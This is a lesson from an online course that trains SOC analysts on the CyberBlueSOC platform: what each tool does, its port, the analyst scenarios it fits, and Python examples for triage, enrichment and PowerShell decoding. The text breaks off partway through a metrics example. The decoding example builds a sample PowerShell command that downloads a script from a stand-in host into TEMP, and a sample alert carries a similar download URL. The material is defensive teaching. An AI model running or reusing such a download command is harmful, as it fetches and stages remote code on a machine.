Lesson 4 of 6·20 min read·Includes quiz

Your Weapon System: CyberBlueSOC

Full platform walkthrough

What You'll Learn

  • Understand what CyberBlueSOC is and why it was built
  • Map every tool in the platform to a specific SOC function (SIEM, EDR, SOAR, CTI, DFIR)
  • Navigate the platform architecture and understand how data flows between tools
  • Identify which tool to open first for any given analyst scenario
  • Gain confidence to start hands-on labs in subsequent modules

What Is CyberBlueSOC?

You've learned what a SOC does, how attackers operate, and the ATT&CK framework that connects defense to offense. Now it's time to meet your training weapon system: CyberBlueSOC.

CyberBlueSOC is an open-source Blue Team platform that bundles 15+ integrated security tools into a unified ecosystem. It is built on Docker containers and was originally designed for self-hosted deployment, and the tools that power it are the same ones used by enterprise SOCs worldwide. In this course, you'll access these tools through instant cloud labs — each lab spins up exactly the tools you need in seconds, pre-loaded with realistic data, ready for you to work.

Every tool that a Fortune 500 SOC analyst uses daily is here — Wazuh, Velociraptor, MISP, TheHive, Suricata, and more. You'll master them one at a time through hands-on labs, then combine them all in the Final Mission.

Why Open-Source Tools? Enterprise SOCs spend hundreds of thousands annually on commercial tooling. CyberBlueSOC uses the same open-source tools that form the backbone of many production SOCs (Wazuh powers 100K+ enterprise deployments, TheHive is used by CERTs worldwide, MISP is the global standard for threat intel sharing). The ecosystem also includes YARA (523+ rules) and Sigma (3,047+ rules) for advanced detection. Learning on these tools means your skills transfer directly to the job market — the same dashboards, the same query languages, the same workflows.

Platform Architecture

Before diving into individual tools, let's understand how CyberBlueSOC is architected. Every tool runs as a Docker container, and they communicate through well-defined APIs and shared data pipelines.

CyberBlueSOC Platform Architecture — 14+ tools organized by SOC function

The architecture follows the same workflow you learned in Lesson 1.1: Collect → Detect → Investigate → Respond → Automate. Each category of tools maps to one or more stages of this cycle.

CyberBlueSOC Data Flow — From alert to resolution across all platform tools

Let's walk through each tool category in detail.


🔵 SIEM & Detection

The SIEM (Security Information and Event Management) layer is the nerve center of any SOC. This is where logs from every source converge, get correlated, and generate alerts.

Wazuh — Your SIEM, XDR & Compliance Engine

Port: 7001 | Role: Log collection, rule-based detection, compliance monitoring

Wazuh is the core detection engine of CyberBlueSOC. It collects logs from endpoints (Windows Event Logs, Linux syslog, macOS unified logs), applications, cloud services, and network devices — then applies 3,000+ built-in detection rules to identify threats in real time.

Wazuh Dashboard — Real-time security event monitoring and alert management

What Wazuh does for you:

  • Log Collection & Normalization — Agents on endpoints ship logs to the Wazuh manager, which normalizes them into a standard format
  • Real-Time Detection — Rules written in XML detect everything from brute-force attacks to malware execution patterns
  • MITRE ATT&CK Mapping — Every Wazuh rule maps to ATT&CK technique IDs, so alerts come pre-tagged with framework context
  • File Integrity Monitoring (FIM) — Detects unauthorized changes to critical system files
  • Vulnerability Detection — Scans installed packages against CVE databases
  • Compliance Dashboards — PCI DSS, HIPAA, NIST 800-53 compliance status out of the box

SOC Analyst Reality Check: In a production SOC, Wazuh is the screen you'll stare at for 80% of your shift. Learning to efficiently navigate its alert dashboard, filter by severity, and pivot from an alert to investigation is the single most valuable skill you can develop. Modules 2 and 3 of this course focus heavily on Wazuh mastery.
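The triage habits described above (filter by severity, read the ATT&CK mapping, pivot to the agent) can be practised on raw Wazuh output before you ever open the dashboard. The following is an added Python example, not code from the lesson or from the Wazuh project. It reads newline-delimited alerts in the layout of Wazuh's alerts.json (rule.level, rule.mitre.id, agent.name); the sample lines, host names, IPs and timestamps are constructed for this example, and the rule IDs should be treated as illustrative rather than as references to specific built-in rules.

```python
import json
from collections import Counter


# Constructed sample of Wazuh alerts.json output (one JSON object per line).
# The field layout follows Wazuh's alert format; every value here is made up.
SAMPLE_ALERTS = """\
{"timestamp":"2024-05-01T10:00:01.000+0000","rule":{"level":5,"id":"5716","description":"sshd: authentication failed.","mitre":{"id":["T1110"]}},"agent":{"name":"linux-web-01"},"data":{"srcip":"203.0.113.10"}}
{"timestamp":"2024-05-01T10:00:07.000+0000","rule":{"level":10,"id":"5712","description":"sshd: brute force trying to get access to the system.","mitre":{"id":["T1110"]}},"agent":{"name":"linux-web-01"},"data":{"srcip":"203.0.113.10"}}
{"timestamp":"2024-05-01T10:03:15.000+0000","rule":{"level":3,"id":"5501","description":"PAM: Login session opened.","mitre":{"id":["T1078"]}},"agent":{"name":"linux-web-01"},"data":{"srcuser":"deploy"}}
{"timestamp":"2024-05-01T10:05:42.000+0000","rule":{"level":12,"id":"100200","description":"Encoded PowerShell command line observed.","mitre":{"id":["T1059.001","T1027"]}},"agent":{"name":"win-ws-07"},"data":{"win":{"eventdata":{"image":"powershell.exe"}}}}
{"timestamp":"2024-05-01T10:06:00.000+0000","rule":{"level":7,"id":"550","description":"Integrity checksum changed.","mitre":{"id":[]}},"agent":{"name":"linux-web-01"},"syscheck":{"path":"/etc/passwd"}}
"""


def load_alerts(text):
    """Parse newline-delimited JSON alerts, skipping blank or malformed lines."""
    alerts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            alerts.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # a truncated line in the log must not abort triage
    return alerts


def filter_by_level(alerts, min_level):
    """Keep alerts whose Wazuh rule level is at or above min_level."""
    return [a for a in alerts if a.get("rule", {}).get("level", 0) >= min_level]


def technique_counts(alerts):
    """Count ATT&CK technique IDs across alerts; rules without a mapping are skipped."""
    counts = Counter()
    for a in alerts:
        for tid in a.get("rule", {}).get("mitre", {}).get("id", []):
            counts[tid] += 1
    return counts


def alerts_for_agent(alerts, agent_name):
    """Pivot from one alert to everything else the same agent reported."""
    return [a for a in alerts if a.get("agent", {}).get("name") == agent_name]


def triage_summary(alerts, min_level=7):
    """The numbers an analyst reads off the dashboard before opening a single alert."""
    high = filter_by_level(alerts, min_level)
    return {
        "total": len(alerts),
        "high_severity": len(high),
        "top_techniques": technique_counts(high).most_common(3),
        "agents": dict(Counter(a["agent"]["name"] for a in high)),
    }


if __name__ == "__main__":
    alerts = load_alerts(SAMPLE_ALERTS)
    print(triage_summary(alerts, min_level=10))
    for a in alerts_for_agent(alerts, "linux-web-01"):
        print(a["timestamp"], a["rule"]["level"], a["rule"]["description"])
```

The severity threshold is the first filter you will apply on the real dashboard; grouping what remains by technique tells you whether you are looking at one campaign or several unrelated events, and the per-agent pivot is the step that turns an alert into an investigation.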

Suricata — Network Intrusion Detection

Role: Signature-based network threat detection (IDS/IPS)

Suricata monitors network traffic in real time, applying thousands of signature rules to detect malicious patterns — port scans, exploit attempts, C2 beaconing, data exfiltration, and more. It integrates directly with Wazuh, feeding network-level alerts into the same dashboard as endpoint alerts.

EveBox — Suricata Event Viewer

Port: 7015 | Role: Suricata alert management and visualization

EveBox provides a clean, modern interface for browsing, searching, and managing Suricata alerts. Think of it as a dedicated network alert dashboard that makes it easy to investigate network-level detections.

EveBox — Suricata network alert viewer with event timeline


🟢 Endpoint Detection & Response (EDR)

While the SIEM sees logs after they're written, EDR gives you live access to endpoints — the ability to query running processes, inspect memory, collect forensic artifacts, and even respond to threats in real time.

Velociraptor — Endpoint Visibility & Live Response

Port: 7000 | Role: EDR, digital forensics, incident response

Velociraptor is one of the most powerful open-source DFIR (Digital Forensics and Incident Response) tools available. It gives you the ability to:

  • Query Endpoints Live — Write VQL (Velociraptor Query Language) queries that execute on endpoints and return results in seconds
  • Collect Forensic Artifacts — Pre-built artifact collectors for browser history, prefetch files, registry hives, event logs, scheduled tasks, and hundreds more
  • Hunt Across Your Fleet — Run a query against all endpoints simultaneously to find indicators of compromise
  • Respond to Incidents — Kill processes, quarantine files, isolate endpoints from the network

Velociraptor — Endpoint investigation and artifact collection interface

Career Tip: Velociraptor skills are among the most sought-after in DFIR job postings. Knowing how to write VQL queries and perform endpoint triage separates junior analysts from senior ones. Module 5 of this course will make you proficient in Velociraptor.


🔍 Network Forensics

When you need to go beyond alerts and examine the actual packets that crossed the wire, these tools have you covered.

Arkime — Full Packet Capture

Port: 7008 | Role: Network traffic recording, session search, packet analysis

Arkime (formerly Moloch) captures and indexes every packet on the network. When you see a suspicious alert in Wazuh or Suricata, you can pivot to Arkime and pull up the actual TCP sessions, see the full HTTP requests, examine file transfers, and reconstruct what happened on the wire.

Arkime — Full packet capture with session search and traffic analysis

Wireshark — Deep Packet Analysis

Port: 7099 | Role: Protocol-level packet inspection (browser-based)

CyberBlueSOC includes a browser-accessible Wireshark instance for deep protocol analysis. When Arkime shows you a suspicious session, you can export the PCAP and open it in Wireshark for byte-level inspection — examining TLS handshakes, DNS queries, protocol anomalies, and embedded payloads.


🟡 Threat Intelligence

Detection is only as good as the intelligence behind it. CyberBlueSOC integrates dedicated threat intelligence tools that feed IOCs (Indicators of Compromise) and adversary context into your detection and investigation workflows.

MISP — Threat Intelligence Platform

Port: 7003 | Role: IOC management, threat intel sharing, feed aggregation

MISP (Malware Information Sharing Platform) is the global standard for structured threat intelligence. In CyberBlueSOC, MISP comes pre-loaded with 280,000+ IOCs from 5 open-source threat feeds (abuse.ch, AlienVault OTX, CIRCL, and more), organized by threat actor, campaign, and ATT&CK technique.

MISP — Threat intelligence platform with IOC management and feed aggregation

How MISP powers your SOC:

  • IOC Enrichment — When you encounter a suspicious IP, domain, or hash, query MISP to instantly check if it's a known malicious indicator
  • Feed Aggregation — Automatically ingests threat feeds to keep your intelligence current, with auto-updates every Sunday at 2 AM
  • Wazuh Integration — MISP feeds directly into Wazuh's CDB lists, enabling real-time alerting when endpoints communicate with known malicious infrastructure
  • TheHive Integration — Observables in TheHive cases can be enriched with MISP data automatically

💡 Pro Tip: The power of MISP multiplies when you combine it with other tools. See a suspicious hash in a Wazuh alert? Search MISP. Found a C2 domain during investigation? Check MISP for related infrastructure. Building an incident timeline in TheHive? MISP adds context about the threat actor's known toolkit and targets.

ATT&CK Navigator — Coverage Visualization

Port: 7013 | Role: MITRE ATT&CK technique coverage mapping

The ATT&CK Navigator provides a visual heatmap of your detection coverage mapped to the ATT&CK framework. You can see at a glance which techniques your Wazuh rules detect (green), which have partial coverage (yellow), and where you have blind spots (red).

ATT&CK Navigator — Detection coverage heatmap across MITRE ATT&CK techniques


🟠 Incident Response & Case Management

When an alert escalates to an incident, you need structured tools to manage the investigation, track tasks, and coordinate response across the team.

TheHive — Case Management

Port: 7005 | Role: Security incident case management and collaboration

TheHive is purpose-built for security operations. When a Wazuh alert requires investigation, you escalate it to a TheHive case. From there, you can:

  • Create Structured Cases — With severity levels, TLP (Traffic Light Protocol) markings, and custom tags
  • Track Observables — IPs, domains, hashes, email addresses — all linked to the case with analysis status
  • Assign Tasks — Break the investigation into steps and assign them to team members
  • Build Timelines — Document the chronological sequence of events for the incident report
  • Integrate with Cortex — Automatically analyze observables against 100+ analyzers

TheHive — Security incident case management with observable tracking

Cortex — Observable Analysis Engine

Port: 7006 | Role: Automated analysis of observables (IPs, domains, hashes, files)

Cortex is TheHive's analysis companion. When you add an observable to a case (say, a suspicious IP address), Cortex can simultaneously run it through 100+ analyzers: VirusTotal, AbuseIPDB, Shodan, MISP, PassiveTotal, and many more. Instead of manually checking each service, Cortex does it all in parallel and returns a consolidated report.

Shuffle SOAR — Security Orchestration & Automation

Port: 7002 | Role: Workflow automation, playbook orchestration, tool integration

Shuffle is the automation backbone of CyberBlueSOC. It connects all tools through visual, drag-and-drop workflows (playbooks) that automate repetitive SOC tasks.

Shuffle SOAR — Visual workflow automation connecting all platform tools

Example automated workflows:

  • Alert Enrichment — Wazuh alert triggers → Shuffle extracts IOCs → queries MISP + VirusTotal → enriches the alert → creates a TheHive case if malicious
  • Phishing Response — Reported phishing email → Shuffle extracts URLs and attachments → detonates in sandbox → blocks malicious URLs at firewall → notifies the user
  • Threat Intel Ingestion — New IOC in MISP → Shuffle pushes it to Wazuh CDB lists → updates firewall block lists → logs the action

Automation Mindset: The best SOC analysts don't just respond to alerts — they identify patterns and build automations. If you find yourself doing the same investigation steps for the same alert type repeatedly, that's a workflow waiting to be automated in Shuffle. Module 7 teaches you to build production-grade SOAR playbooks.
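The Alert Enrichment workflow listed above (Wazuh alert, extract IOCs, query MISP, create a TheHive case if malicious) is easy to reason about once you see it as plain code. What follows is an added Python example, not Shuffle's own code and not part of the original lesson. It assumes a Wazuh alert as a dict, stands in for the MISP lookup with a constructed in-memory attribute table, leaves out the VirusTotal step because it needs network access, and uses an assumed mapping from Wazuh rule level to TheHive severity and an assumed TLP default; the TheHive observable fields (dataType, data, ioc, tags) follow TheHive's naming.

```python
# Constructed stand-in for a MISP attribute export (value -> attribute type and tags).
# In Shuffle this lookup would be a MISP app action; the values here are made up.
MISP_ATTRIBUTES = {
    "198.51.100.23": {"type": "ip-dst", "tags": ["c2-infrastructure", "ATT&CK:T1071"]},
    "a1" * 32: {"type": "sha256", "tags": ["malware-sample"]},  # fake hash, not a real sample
}


def wazuh_level_to_severity(level):
    """Assumed mapping from Wazuh rule level (0-15) to TheHive severity (1 low .. 4 critical)."""
    if level >= 13:
        return 4
    if level >= 10:
        return 3
    if level >= 7:
        return 2
    return 1


def extract_observables(alert):
    """Pull observables out of a Wazuh alert as (TheHive dataType, value) pairs."""
    data = alert.get("data", {})
    found = []
    for key in ("srcip", "dstip"):
        if key in data:
            found.append(("ip", data[key]))
    if "url" in data:
        found.append(("url", data["url"]))
    sha = alert.get("syscheck", {}).get("sha256_after")
    if sha:
        found.append(("hash", sha))
    # Deduplicate while keeping order so the case lists each indicator once.
    return list(dict.fromkeys(found))


def enrich(observables, misp):
    """Check every observable against the intel store; known values are flagged as IOCs."""
    return [
        {"dataType": t, "data": v, "ioc": v in misp, "tags": misp.get(v, {}).get("tags", [])}
        for t, v in observables
    ]


def build_case(alert, enriched):
    """Escalate to a TheHive case only if at least one observable is a known IOC."""
    if not any(o["ioc"] for o in enriched):
        return None
    rule = alert["rule"]
    return {
        "title": f"[{alert['agent']['name']}] {rule['description']}",
        "severity": wazuh_level_to_severity(rule["level"]),
        "tlp": 2,  # TLP:AMBER, an assumed default for internal cases
        "tags": sorted({tag for o in enriched for tag in o["tags"]} | {f"wazuh:{rule['id']}"}),
        "observables": enriched,
    }


def run_playbook(alert, misp=MISP_ATTRIBUTES):
    """The whole enrichment flow: extract, enrich, decide whether to open a case."""
    enriched = enrich(extract_observables(alert), misp)
    return {"hits": [o["data"] for o in enriched if o["ioc"]], "case": build_case(alert, enriched)}


# Constructed alerts: one contacting a listed address, one from an unlisted address.
MALICIOUS_ALERT = {
    "rule": {"level": 12, "id": "100300", "description": "Unexpected outbound connection from Office process."},
    "agent": {"name": "win-ws-07"},
    "data": {"dstip": "198.51.100.23", "url": "http://198.51.100.23/update.ps1"},
}
BENIGN_ALERT = {
    "rule": {"level": 5, "id": "5716", "description": "sshd: authentication failed."},
    "agent": {"name": "linux-web-01"},
    "data": {"srcip": "192.0.2.5"},
}

if __name__ == "__main__":
    print(run_playbook(MALICIOUS_ALERT))
    print(run_playbook(BENIGN_ALERT))
```

Note that the case is created only on an intel hit, and that observables which did not match are still attached to it with ioc set to false: that is what lets an analyst in TheHive see what was checked, not only what was found.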


🛠️ Utility & Analysis Tools

CyberChef — The Data Swiss Army Knife

Port: 7004 | Role: Data encoding/decoding, analysis, transformation

CyberChef is an indispensable tool for SOC analysts. It handles hundreds of data transformation "recipes": Base64 decoding, URL decoding, hex-to-ASCII conversion, timestamp parsing, hash generation, XOR decryption, and much more. When you find obfuscated PowerShell in a Wazuh alert or encoded payloads in network traffic, CyberChef is where you decode them.

CyberChef — Data analysis and transformation tool with recipe-based workflows


🗂️ Management & Monitoring

Fleet — Endpoint Inventory (osquery)

Port: 7007 | Role: osquery management, endpoint inventory, compliance queries

Fleet manages osquery agents on your endpoints, allowing you to run SQL-like queries against your entire fleet. Want to know which endpoints have a specific vulnerable software version? Which machines have unusual scheduled tasks? Fleet gives you those answers across hundreds or thousands of endpoints simultaneously.

Portainer — Container Management

Port: 9443 | Role: Docker container monitoring and management

Since CyberBlueSOC runs entirely on Docker, Portainer gives you visibility into every container: status, resource usage, logs, and the ability to restart services.

CyberBlueSOC Portal — Centralized Access

Port: 5443 (HTTPS) / 5500 (HTTP) | Role: Unified dashboard for all platform tools

The CyberBlueSOC Portal is your central command center. It provides a single web interface where you can see the status of every tool, access them with one click, and monitor container health. When you first set up the platform, this is the first page you'll visit.

CyberBlueSOC Portal — Centralized access dashboard for all platform tools


Quick Reference: Every Tool at a Glance

CyberBlueSOC Tool Quick Reference — All tools with ports and descriptions

Tool | Port | Category | Primary Function
Velociraptor | 7000 | EDR & Forensics | Endpoint detection, live response, artifact collection
Wazuh | 7001 | SIEM & Detection | Log analysis, real-time detection, 3000+ rules
Shuffle | 7002 | SOAR | Workflow automation, playbook orchestration
MISP | 7003 | Threat Intel | IOC management, 280K+ indicators, feed aggregation
CyberChef | 7004 | Utility | Data decoding, encoding, analysis recipes
TheHive | 7005 | Case Management | Incident cases, observable tracking, task assignment
Cortex | 7006 | Analysis | Observable analyzers, 100+ integrations
Fleet | 7007 | Management | osquery endpoint inventory and queries
Arkime | 7008 | Network Forensics | Full packet capture, session search
Caldera | 7009 | Adversary Emulation | Red team attack simulation and testing
ATT&CK Navigator | 7013 | Threat Intel | Detection coverage visualization
EveBox | 7015 | Detection | Suricata event viewer and alert management
Wireshark | 7099 | Network Forensics | Deep packet inspection (browser-based)
CyberBlueSOC Portal | 5443 | Management | Centralized access to all tools
Portainer | 9443 | Management | Docker container monitoring

Mapping Tools to SOC Scenarios

The real power of CyberBlueSOC becomes clear when you map tools to the scenarios you'll face as a SOC analyst. Here's your decision guide:

Scenario 1: "I see a high-severity alert in Wazuh"

  1. Wazuh → Read the alert details, check the ATT&CK technique mapping
  2. Velociraptor → Query the affected endpoint for running processes, network connections, recent file modifications
  3. MISP → Check any suspicious IPs, domains, or hashes against threat intelligence
  4. TheHive → If confirmed malicious, create a case and begin structured investigation

Scenario 2: "Suricata flagged outbound C2 traffic"

  1. EveBox → Review the Suricata alert and its signature details
  2. Arkime → Pull up the full network session, examine packet payloads
  3. MISP → Cross-reference the destination IP/domain with known C2 infrastructure
  4. Velociraptor → Investigate the source endpoint for compromise indicators
  5. Shuffle → Automate blocking the C2 IP at the firewall

Scenario 3: "Suspicious encoded PowerShell detected"

  1. Wazuh → Read the original alert and extract the encoded command
  2. CyberChef → Decode the Base64/obfuscated content to reveal the actual payload
  3. MISP → Check file hashes or domains found in the decoded payload
  4. Velociraptor → Hunt for the PowerShell execution across all endpoints
  5. TheHive → Document findings, assign containment tasks
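Step 2 of this scenario, and the CyberChef description in the Utility section, both come down to the same decode: PowerShell's -EncodedCommand argument is Base64 over UTF-16LE text, which is why a plain Base64 decode shows every character separated by a NUL byte. The following is an added Python example (not the lesson's material and not CyberChef's code) that does what a "From Base64, Decode text UTF-16LE" recipe does, repairs stripped padding, and then pulls URLs, domains and SHA-256 values out of the decoded script. The command line and script are constructed, using the reserved example.invalid domain.

```python
import base64
import re
from urllib.parse import urlparse

# Matches -e, -ec, -enc and -EncodedCommand (any case) followed by the Base64 argument.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
SHA256_RE = re.compile(r"\b[a-fA-F0-9]{64}\b")


def extract_encoded_blob(command_line):
    """Return the Base64 argument following the encoded-command flag, or None."""
    m = ENC_FLAG.search(command_line)
    return m.group(1) if m else None


def decode_powershell(blob):
    """Decode an -EncodedCommand value.

    PowerShell encodes the script as UTF-16LE before Base64, so the raw bytes carry a
    NUL after every ASCII character; that pattern is used to pick UTF-16LE, with UTF-8
    as the fallback for blobs produced by other tooling. Missing '=' padding (common
    after log truncation or copy-paste) is repaired first.
    """
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)
    raw = base64.b64decode(blob)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_iocs(text):
    """Indicators worth checking in MISP: URLs, the hostnames inside them, and SHA-256 hashes."""
    urls = URL_RE.findall(text)
    domains = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    return {"urls": urls, "domains": domains, "sha256": SHA256_RE.findall(text)}


def encode_powershell(script):
    """Build an -EncodedCommand value the way PowerShell does; used here only to construct the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyse_command_line(command_line):
    """Full Scenario 3 step 2: find the blob, decode it, list the indicators it contains."""
    blob = extract_encoded_blob(command_line)
    if blob is None:
        return None
    decoded = decode_powershell(blob)
    return {"decoded": decoded, "iocs": extract_iocs(decoded)}


# Constructed sample pointing at a reserved .invalid domain.
SAMPLE_SCRIPT = "Invoke-WebRequest -Uri http://example.invalid/update.ps1 -OutFile $env:TEMP\\update.ps1"
SAMPLE_COMMAND_LINE = "powershell.exe -NoProfile -EncodedCommand " + encode_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(analyse_command_line(SAMPLE_COMMAND_LINE))
```

The UTF-16LE detection is the part worth remembering: a decoder that assumes UTF-8 will show the script as unreadable and an analyst may wrongly conclude the blob is binary.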

Scenario 4: "I need to assess our detection coverage"

  1. ATT&CK Navigator → Visualize current coverage mapped to techniques
  2. Wazuh → Review which rule groups are active and their ATT&CK mappings
  3. MISP → Check intelligence on techniques used by threat actors targeting your sector
  4. Shuffle → Build a workflow to regularly export coverage metrics

How the Course is Structured Around These Tools: Each subsequent module focuses on mastering one or two tools in depth. Module 2 covers Wazuh SIEM mastery. Module 3 tackles Suricata network detection. Module 4 dives into threat intelligence with MISP. Module 5 teaches Velociraptor DFIR. Module 6 covers incident response with TheHive and Cortex. Module 7 teaches Shuffle SOAR automation. By the end, you'll be proficient in every tool in this stack.


How Data Flows Through the Platform

Understanding the data flow is critical for effective investigation. Here's how information moves through CyberBlueSOC during a typical alert lifecycle:

ENDPOINT                    NETWORK
  │                            │
  │ Wazuh Agent                │ Suricata
  │ (logs, FIM, vuln)          │ (packets, signatures)
  ▼                            ▼
┌─────────────────────────────────────┐
│         WAZUH MANAGER               │
│  (correlation, rules, alerting)     │
│  3000+ rules × ATT&CK mapping       │
└──────────┬──────────────────────────┘
           │
     ┌─────┴──────┐
     │  ALERT     │
     │  GENERATED │
     └─────┬──────┘
           │
    ┌──────┴───────────────────────┐
    │                              │
    ▼                              ▼
┌──────────┐              ┌──────────────┐
│ MISP     │              │ VELOCIRAPTOR │
│ (enrich  │              │ (investigate │
│  IOCs)   │              │  endpoint)   │
└────┬─────┘              └──────┬───────┘
     │                           │
     └───────────┬───────────────┘
                 │
                 ▼
           ┌────────────┐
           │  THE HIVE  │
           │  (case     │──→ CORTEX (analyze)
           │  mgmt)     │
           └─────┬──────┘
                 │
                 ▼
           ┌────────────┐
           │  SHUFFLE   │──→ Block, Notify,
           │  (automate)│    Update, Report
           └────────────┘

How You'll Access These Tools

In this course, you don't need to install anything. Each lab provides instant cloud access to exactly the tools you need for that exercise.

Per-Lab Cloud Environments

When you click "Start Lab" on any lab page, the platform spins up a dedicated environment with only the containers that lab requires — pre-loaded with the exact data you need to complete the exercise. Here's how it works:

Lab Type | What You Get | Startup Time
Wazuh Labs (Module 2) | Wazuh Manager + Indexer + Dashboard + Agent with pre-loaded alerts | ~30 seconds
Suricata Labs (Module 3) | Suricata + EveBox + replayed PCAPs with 50K+ events | ~20 seconds
MISP Labs (Module 5) | MISP + 280K+ IOCs from real threat feeds | ~30 seconds
Velociraptor Labs (Module 6) | Velociraptor Server + Client with planted artifacts | ~15 seconds
YARA / Sigma Labs (Modules 7-8) | Lightweight analysis environment + Wazuh for testing rules | ~15 seconds
TheHive Labs (Module 9) | TheHive + Cortex + Elasticsearch with pre-created alerts | ~30 seconds
Shuffle Labs (Module 10) | Shuffle + Wazuh + MISP + TheHive for building automations | ~45 seconds
Final Mission | Full stack — all tools interconnected for the capstone exercise | ~60 seconds

Each lab is disposable — when you're done (or after 2 hours idle), it's automatically destroyed. No cleanup, no state from previous labs, every session starts fresh.

💡 Why Per-Lab Containers? Instead of overwhelming you with 15+ tools from day one, each lab focuses on exactly the tools you need for that exercise. Module 2 = just Wazuh. Module 6 = just Velociraptor. You master one tool at a time, then combine them in cross-tool labs and the Final Mission. This matches how real SOC training works — focused skill building before integration.

Self-Hosted Option: Run Your Own CyberBlueSOC

Everything you use in this course is built on CyberBlueSOC — a fully open-source platform available on GitHub. If you want your own permanent lab environment with all 15+ tools running locally, you absolutely can:

git clone https://github.com/CyberBlu3s/CyberBlue.git
cd CyberBlue
chmod +x cyberblue_install.sh
./cyberblue_install.sh

The install is fully automated and takes about 30 minutes. When it's done, you'll have the full SOC stack accessible through the CyberBlueSOC Portal at https://YOUR_IP:5443.

What you get with self-hosted:

Feature | Cloud Labs (This Course) | Self-Hosted CyberBlueSOC
Setup | Click "Start Lab" — ready in seconds | Install script — ready in ~30 min
Tools | Only what each lab needs (focused) | All 15+ tools, all the time
Data | Pre-loaded per exercise | 50K+ Suricata events, 280K+ MISP IOCs
Requirements | Just a browser | Ubuntu 22.04+, 16GB+ RAM, 150GB+ disk
Persistence | Destroyed after session | Permanent — your data stays
Cost | Included with subscription | Free (your own hardware/cloud VM)
Best for | Following the course curriculum | Experimentation, custom scenarios, university labs

Self-hosted is ideal if you:

  • Want to experiment freely beyond the course exercises
  • Are setting up a lab for a university class or team
  • Prefer to keep all data on your own infrastructure
  • Want to practice the real-world skill of deploying and maintaining a SOC stack

💡 Pro Tip: Many SOC job interviews ask "tell me about your home lab." Having a self-hosted CyberBlueSOC instance — with your own custom rules, your own threat feeds, your own investigation cases — is a powerful portfolio piece. Consider self-hosting once you've completed the course, so you know exactly what each tool does before you set it up yourself.

Lab Environment Tip: Throughout this course, every lab exercise will tell you exactly which tool(s) are included and provide direct browser links when you launch. You don't need to memorize port numbers or install anything — but understanding which tool to reach for in each scenario is essential. That's what this lesson prepares you for.


What Comes Next

You now have a complete mental map of the CyberBlueSOC platform — every tool, its purpose, and how they interconnect. In the upcoming modules, you'll go from overview to hands-on mastery:

  • Module 2: Wazuh SIEM Mastery — Deep dive into alert triage, rule writing, dashboard customization, and detection engineering
  • Module 3: Network Detection with Suricata — Signature writing, traffic analysis, and network hunting
  • Module 4: Threat Intelligence with MISP — Feed management, IOC correlation, and integration with detection tools
  • Module 5: Velociraptor DFIR — VQL queries, artifact collection, endpoint forensics, and incident response
  • Module 6: Case Management with TheHive & Cortex — Structured incident response workflows
  • Module 7: Automation with Shuffle SOAR — Building playbooks that make your SOC faster and more consistent

Your weapon system is loaded and ready. Click "Start Lab" and get your hands on it.


IOC Search & Investigation

One of the most common daily tasks for SOC analysts is searching for Indicators of Compromise across your toolset. CyberBlueSOC makes this seamless by providing integrated search capabilities.

IOC Search — Cross-platform indicator investigation workflow

When you receive an alert or intelligence report, you can search for IOCs across:

  • Wazuh — Search logs and alerts for IP addresses, file hashes, user accounts
  • MISP — Cross-reference against 280K+ known indicators with full context
  • Arkime — Search network sessions by IP, port, protocol, or content
  • Velociraptor — Hunt for file hashes, process names, or registry keys across all endpoints

Operational Metrics & Monitoring

A mature SOC doesn't just detect threats — it measures its own effectiveness. CyberBlueSOC provides built-in dashboards for tracking key operational metrics.

SOC Metrics Dashboard — Alert volumes, response times, and detection coverage

Key metrics to track:

  • Mean Time to Detect (MTTD) — How quickly your rules catch threats
  • Mean Time to Respond (MTTR) — How quickly you contain and remediate incidents
  • Alert Volume by Severity — Distribution of critical, high, medium, and low alerts
  • Detection Coverage — Percentage of ATT&CK techniques you can detect
  • False Positive Rate — Percentage of alerts that turn out to be benign

These metrics will become central to your growth as an analyst. As you progress through the course, you'll learn to not just monitor these dashboards, but to improve the numbers by writing better detection rules, tuning alert thresholds, and automating repetitive responses.
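The five metrics listed above are straightforward to compute, but two details decide whether the numbers mean anything: false positives must be left out of MTTD and MTTR (otherwise a fast-closed benign alert flatters both), and incidents that are still open must be excluded from MTTR rather than counted as zero. This is an added Python example, not part of the lesson and not the platform's dashboard code; the incident records, technique sets and timestamps are constructed, and "detection coverage" is computed against an assumed in-scope technique list rather than the full ATT&CK matrix.

```python
from collections import Counter
from datetime import datetime


# Constructed incident records, as a case-management export might provide them.
# Timestamps are ISO 8601; 'contained' is None while an incident is still open.
INCIDENTS = [
    {"id": "INC-1", "severity": "high", "technique": "T1110",
     "first_event": "2024-05-01T10:00:00", "detected": "2024-05-01T10:04:00",
     "contained": "2024-05-01T11:30:00", "false_positive": False},
    {"id": "INC-2", "severity": "critical", "technique": "T1059.001",
     "first_event": "2024-05-01T12:00:00", "detected": "2024-05-01T12:10:00",
     "contained": "2024-05-01T12:40:00", "false_positive": False},
    {"id": "INC-3", "severity": "medium", "technique": "T1078",
     "first_event": "2024-05-01T12:58:00", "detected": "2024-05-01T13:00:00",
     "contained": "2024-05-01T13:05:00", "false_positive": True},
    {"id": "INC-4", "severity": "low", "technique": "T1078",
     "first_event": "2024-05-01T14:00:00", "detected": "2024-05-01T14:16:00",
     "contained": "2024-05-01T15:26:00", "false_positive": False},
    {"id": "INC-5", "severity": "high", "technique": "T1071",
     "first_event": "2024-05-01T16:00:00", "detected": "2024-05-01T16:05:00",
     "contained": None, "false_positive": False},
]

# Constructed coverage data: techniques with at least one active rule, and the
# (assumed) list of techniques the team treats as in scope, which is the denominator.
DETECTED_TECHNIQUES = {"T1110", "T1059.001", "T1078", "T1071", "T1053", "T1003"}
IN_SCOPE_TECHNIQUES = {"T1110", "T1059.001", "T1078", "T1071", "T1053", "T1003",
                       "T1021", "T1566", "T1486", "T1047"}


def _minutes(start, end):
    return (datetime.fromisoformat(end) - datetime.fromisoformat(start)).total_seconds() / 60


def mttd_minutes(incidents):
    """Mean time from first malicious event to detection, over true positives only."""
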